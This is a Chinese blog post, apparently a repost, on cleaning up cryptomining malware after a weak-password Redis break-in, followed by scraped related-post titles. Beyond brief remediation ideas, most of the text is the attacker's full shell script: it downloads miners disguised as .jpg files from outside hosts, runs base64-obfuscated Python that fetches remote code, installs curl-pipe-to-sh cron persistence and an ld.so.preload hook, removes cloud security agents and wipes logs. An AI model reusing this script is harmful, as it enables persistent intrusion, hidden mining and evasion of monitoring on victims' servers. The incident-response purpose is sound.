常见的挖矿程序处理方式
这个是笔者前些天帮助朋友处理的挖矿的程序脚本,本次没有写具体处理方式,写的处理过程的思路和方法,如果你有好的方法可以一起分享学习,Thankyou!
1.服务器怎么会中挖矿木马程序
肉鸡 弱口令 webshell xss 软件漏洞bug redis zk mysql 0day等造成服务器被扫描并且提权
2 首先遇到这样情况,我们杀掉挖矿的程序它会自己起来
没清理干净 定时任务 命令修改 开机自启动文件 历史记录
3.如何处理?
首先根据业务判定,造成业务故障,可选用HA方案切走应用服务,对服务器进行下架切断一切网络来源,进行相关处理
我一般处理方案是这样,首先通过iptables或者firewalls防火墙手段封死攻击者地址,类似与切断网络来源,接下来我们就可以进行分析和处理挖矿的原因
处理的方式 可以根据挖矿脚本进行分析 一个一个进行处理 对修改的命令和文件进行恢复和删除
对系统和web进行安全测试,对系统漏洞进行修复.
4.原因分析
Redis存在弱口令导致的此次故障问题,Redis可以通过config配置方式 修改配置目录将自己的key放在服务器上,以达到服务器提权的目的
1 #!/bin/bash 2 SHELL=/bin/sh 3 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 4 5 function kills() { 6 pkill -f sourplum 7 pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg 8 rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik 9 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius 10 rm -rf /tmp/*index_bak* 11 rm -rf /tmp/*httpd.conf* 12 rm -rf /tmp/*httpd.conf 13 rm -rf /tmp/a7b104c270 14 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 15 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 16 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 17 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 18 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 19 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 20 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 21 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 22 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 23 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 24 ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 25 ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9 26 ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9 27 ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9 28 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9 29 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9 30 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9 31 ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9 32 pkill -f biosetjenkins 33 pkill -f AnXqV.yam 34 pkill -f xmrigDaemon 35 pkill -f xmrigMiner 36 pkill -f xmrig 37 pkill -f Loopback 38 pkill -f apaceha 39 pkill -f cryptonight 40 pkill -f stratum 41 pkill -f mixnerdx 42 pkill -f performedl 43 pkill -f JnKihGjn 44 pkill -f irqba2anc1 45 pkill -f irqba5xnc1 46 pkill -f irqbnc1 47 pkill -f ir29xc1 48 pkill -f conns 49 pkill -f irqbalance 50 pkill -f crypto-pool 51 pkill -f minexmr 52 pkill -f XJnRj 53 pkill -f NXLAi 54 pkill -f BI5zj 55 pkill -f askdljlqw 56 pkill -f minerd 57 pkill -f minergate 58 pkill -f Guard.sh 59 pkill -f ysaydh 60 pkill -f bonns 61 pkill -f donns 62 pkill -f kxjd 63 pkill -f Duck.sh 64 pkill -f bonn.sh 65 pkill -f conn.sh 66 pkill -f kworker34 67 pkill -f kw.sh 68 pkill -f pro.sh 69 pkill -f polkitd 70 pkill -f acpid 71 pkill -f icb5o 72 pkill -f nopxi 73 pkill -f irqbalanc1 74 pkill -f minerd 75 pkill -f i586 76 pkill -f gddr 77 pkill -f mstxmr 78 pkill -f ddg.2011 79 pkill -f wnTKYg 80 pkill -f deamon 81 pkill -f disk_genius 82 pkill -f sourplum 83 pkill -f bashx 84 pkill -f bashg 85 pkill -f bashe 86 pkill -f bashf 87 pkill -f bashh 88 pkill -f XbashY 89 pkill -f libapache 90 pkill -f qW3xT.2 91 pkill -f /usr/bin/.sshd 92 pkill -f sustes 93 rm -rf /var/tmp/j* 94 rm -rf /tmp/j* 95 rm -rf /var/tmp/java 96 rm -rf /tmp/java 97 rm -rf /var/tmp/java2 98 rm -rf /tmp/java2 99 rm -rf /var/tmp/java* 100 rm -rf /tmp/java* 101 rm -rf /tmp/httpd.conf 102 rm -rf /tmp/conn 103 rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache 104 rm -rf /tmp/conns 105 rm -f /tmp/irq.sh 106 rm -f /tmp/irqbalanc1 107 rm -f /tmp/irq 108 rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so 109 rm -rf /tmp/.systemd-private-* 110 netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 111 netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 112 netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 113 netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 114 netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 115 netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 116 netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 117 netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 118 netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 119 netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 120 netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 121 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 122 p=$(ps auxf|grep -v grep|grep kworkerds|wc -l) 123 if [ ${p} -eq 0 ];then 124 ps auxf|grep -v grep | awk '{if($3>=90.0) print $2}'| xargs kill -9 125 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 126 fi 127 } 128 129 function system() { 130 if [ ! -f "/bin/dns" ]; then 131 curl -fsSL https://pastebin.com/raw/KqzUfgz0 -o /bin/dns && chmod 755 /bin/dns 132 if [ ! -f "/bin/dns" ]; then 133 wget https://pastebin.com/raw/KqzUfgz0 -O /bin/dns && chmod 755 /bin/dns 134 fi 135 if [ ! -f "/etc/crontab" ]; then 136 echo -e "0 1 * * * root dns" >> /etc/crontab 137 else 138 sed -i '$d' /etc/crontab && echo -e "0 1 * * * root dns" >> /etc/crontab 139 fi 140 fi 141 } 142 143 function top() { 144 mkdir -p /usr/local/lib/ 145 if [ ! -f "/usr/local/lib/libdns.so" ]; then 146 curl -fsSL https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so 147 if [ ! -f "/usr/local/lib/libdns.so" ]; then 148 wget https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -O /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so 149 fi 150 fi 151 if [ ! -f "/etc/ld.so.preload" ]; then 152 echo /usr/local/lib/libdns.so > /etc/ld.so.preload 153 else 154 sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libdns.so >> /etc/ld.so.preload 155 fi 156 157 touch -acmr /bin/sh /etc/ld.so.preload 158 touch -acmr /bin/sh /usr/local/lib/libdns.so 159 } 160 161 function python() { 162 nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 & 163 touch /tmp/.tmpp 164 } 165 166 function echocron() { 167 echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /etc/cron.d/root 168 echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /etc/cron.d/apache 169 echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /var/spool/cron/root 170 mkdir -p /var/spool/cron/crontabs 171 echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh\n##" > /var/spool/cron/crontabs/root 172 mkdir -p /etc/cron.hourly 173 curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner 174 if [ ! -f "/etc/cron.hourly/oanacroner" ]; then 175 wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner 176 fi 177 mkdir -p /etc/cron.daily 178 curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner 179 if [ ! -f "/etc/cron.daily/oanacroner" ]; then 180 wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner 181 fi 182 mkdir -p /etc/cron.monthly 183 curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner 184 if [ ! -f "/etc/cron.monthly/oanacroner" ]; then 185 wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner 186 fi 187 touch -acmr /bin/sh /var/spool/cron/root 188 touch -acmr /bin/sh /var/spool/cron/crontabs/root 189 touch -acmr /bin/sh /etc/cron.d/apache 190 touch -acmr /bin/sh /etc/cron.d/root 191 touch -acmr /bin/sh /etc/cron.hourly/oanacroner 192 touch -acmr /bin/sh /etc/cron.daily/oanacroner 193 touch -acmr /bin/sh /etc/cron.monthly/oanacroner 194 } 195 196 function tables() { 197 iptables -I INPUT -p TCP --dport 6379 -j REJECT 198 iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT 199 iptables-save 200 touch /tmp/.tables 201 } 202 203 function uninstall() { 204 if ps aux | grep -i '[a]liyun'; then 205 wget http://update.aegis.aliyun.com/download/uninstall.sh 206 chmod +x uninstall.sh 207 ./uninstall.sh 208 wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh 209 chmod +x quartz_uninstall.sh 210 ./quartz_uninstall.sh 211 rm -f uninstall.sh quartz_uninstall.sh 212 pkill aliyun-service 213 rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service 214 rm -rf /usr/local/aegis*; 215 elif ps aux | grep -i '[y]unjing'; then 216 /usr/local/qcloud/stargate/admin/uninstall.sh 217 /usr/local/qcloud/YunJing/uninst.sh 218 /usr/local/qcloud/monitor/barad/admin/uninstall.sh 219 fi 220 touch /tmp/.uninstall 221 } 222 223 function downloadrun() { 224 ps=$(netstat -anp | grep 167.99.8 | wc -l) 225 if [ ${ps} -eq 0 ];then 226 if [ ! -f "/tmp/kworkerds" ]; then 227 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds 228 if [ ! -f "/tmp/kworkerds" ]; then 229 wget https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds 230 fi 231 nohup /tmp/kworkerds >/dev/null 2>&1 & 232 else 233 nohup /tmp/kworkerds >/dev/null 2>&1 & 234 fi 235 fi 236 } 237 238 function downloadrunxm() { 239 mkdir -p /var/tmp 240 chmod 1777 /var/tmp 241 pm=$(netstat -anp | grep 167.99.8 | wc -l) 242 if [ ${pm} -eq 0 ];then 243 rm -rf /var/tmp/config.json* 244 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -o /var/tmp/config.json && chmod +x /var/tmp/config.json 245 if [ ! -f "/var/tmp/config.json" ]; then 246 wget https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -O /var/tmp/config.json && chmod +x /var/tmp/config.json 247 fi 248 ARCH=$(uname -i) 249 if [ "$ARCH" == "x86_64" ]; then 250 rm -rf /var/tmp/kworkerds* 251 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds 252 if [ ! -f "/var/tmp/kworkerds" ]; then 253 wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds 254 fi 255 nohup /var/tmp/kworkerds >/dev/null 2>&1 & 256 elif [ "$ARCH" == "i386" ]; then 257 rm -rf /var/tmp/kworkerds* 258 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds 259 if [ ! -f "/var/tmp/kworkerds" ]; then 260 wget https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds 261 fi 262 nohup /var/tmp/kworkerds >/dev/null 2>&1 & 263 else 264 rm -rf /var/tmp/kworkerds* 265 curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds 266 if [ ! -f "/var/tmp/kworkerds" ]; then 267 wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds 268 fi 269 nohup /var/tmp/kworkerds >/dev/null 2>&1 & 270 fi 271 fi 272 } 273 274 mkdir -p /tmp 275 chmod 1777 /tmp 276 update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/SGM25Vs3 ) 277 if [ ${update}x = "update"x ];then 278 echocron 279 else 280 if [ ! -f "/tmp/.uninstall" ]; then 281 uninstall 282 fi 283 if [ ! -f "/tmp/.tables" ]; then 284 tables 285 fi 286 if [ ! -f "/tmp/.tmpu" ]; then 287 rm -rf /tmp/.tmpp 288 python 289 fi 290 kills 291 downloadrun 292 echocron 293 system 294 top 295 sleep 10 296 port=$(netstat -anp | grep 167.99.8 | wc -l) 297 if [ ${port} -eq 0 ];then 298 downloadrunxm 299 fi 300 echo 0>/var/spool/mail/root 301 echo 0>/var/log/wtmp 302 echo 0>/var/log/secure 303 echo 0>/var/log/cron 304 curl -sk https://2no.co/11Grb 305 fi 306 #
转载于:https://www.cnblogs.com/egrep/p/9721538.html
常见的挖矿程序处理方式相关推荐
- 吐血整理!程序员常见的几种变现方式!
今天聊一个特俗但是大家都想的事情, 那就是「赚钱」这件事. 先说为什么这个事情「特俗」,因为其实我发现我身边大部分程序员不爱谈钱,或者羞于谈钱. 加上程序员工资普遍比较高,所以早期都没啥压力,但是随着 ...
- 挖矿程序的处理方式及步骤
概述 随着币圈市场交易的活跃,币价也被日益推高. 从BTC兑美元的在线交易平台上可以看出,BTC的价格屡创新高,这与MG的2W亿脱不了干系. "重赏之下,必有勇夫",在互联网圈里也 ...
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...
- codesys 串口通讯实例_常见的PLC程序实例,车库自动门的PLC控制!
点击箭头处"工业之家",选择"关注公众号"! PLC控制车库自动门实例 车库自动门控制 (1)明确系统控制要求 系统要求车库门在车辆进出时能自动打开关闭,车库门 ...
- 【警惕】大量未修复WebLogic WSAT组件RCE漏洞的主机被挖矿程序攻击
警惕 从1月1日开始,大量未修复WebLogic WSAT(全称:Web Services Atomic Transactions)组件RCE漏洞的主机被挖矿程序攻击,尤其是1月3日,更是大面积爆发 ...
- 小程序源码:修复登录大河盲盒小程序源码,实现运营“玩法自由”,超多功能的盲盒型抽奖挖矿程序源码下载
程序介绍 应用支持哪些类型的商品? 1.实物需邮寄商品,用户领取时填写收货信息,后台发货. 2.虚拟商品,如:教程.课程.图文.图片.下载链接等等. 3.卡密商品,后台添加卡密商品,填写使用方法.批量 ...
- 移除挖矿程序过程记录
前言: 早上发现一个服务器的挖矿程序预警消息: 那么接下来开始处理这个问题, 废话不说直接上有效的操作了: 1.查看系统定时任务及修改: 查看系统定时任务:方式一:crontab -lcrontab ...
- 四种常见的 POST 提交数据方式 专题
原文地址为: 四种常见的 POST 提交数据方式 专题 定义和用法 enctype 属性规定在发送到服务器之前应该如何对表单数据进行编码. 默认地,表单数据会编码为 "application ...
- centos8 处理挖矿程序攻击
ll /usr/bin/top* top命令被修改,并且隐藏了两个进程 chattr命令不可用,先删除e2fsprogs再重新安装. yum remove e2fsprogs #rpm -qa|gre ...
最新文章
- 2022,人工智能开启未来新密码
- LeetCode 495. Teemo Attacking
- 第一课 计算机组成原理(哈工大)
- 比较强得一个个性签名
- java 将图片转成二进制文件bin_java 问题:怎样把一个bin二进制图片文件用java代码打开?求解!...
- CodeForces - 1248E Queue in the Train(大模拟)
- redis订阅执行一段时间自动停止_面试系列 redis 分布式锁amp;数据一致性
- [Redux/Mobx] Redux由哪些组件构成?
- C++primer第十一章 关联容器 11.1使用关联容器 11.2 关联容器概述
- 再谈borland与MS对BUG的不同态度~
- python做统计_利用 Python 进行统计
- 采用C编写程序实现从文件读取操作
- golang 的channels 行为
- Redis 性能优化思路,写的非常好!
- 使用include实现布局(layout)复用
- Java丨基础:十三、集合
- SM3密码杂凑算法原理
- 用C#调用Matlab图像处理自制QQ游戏2D桌球瞄准器
- 连接网络打印机报错0x000003e3
- ppspp android编译,PPSSPP模拟器通用设置,伪福利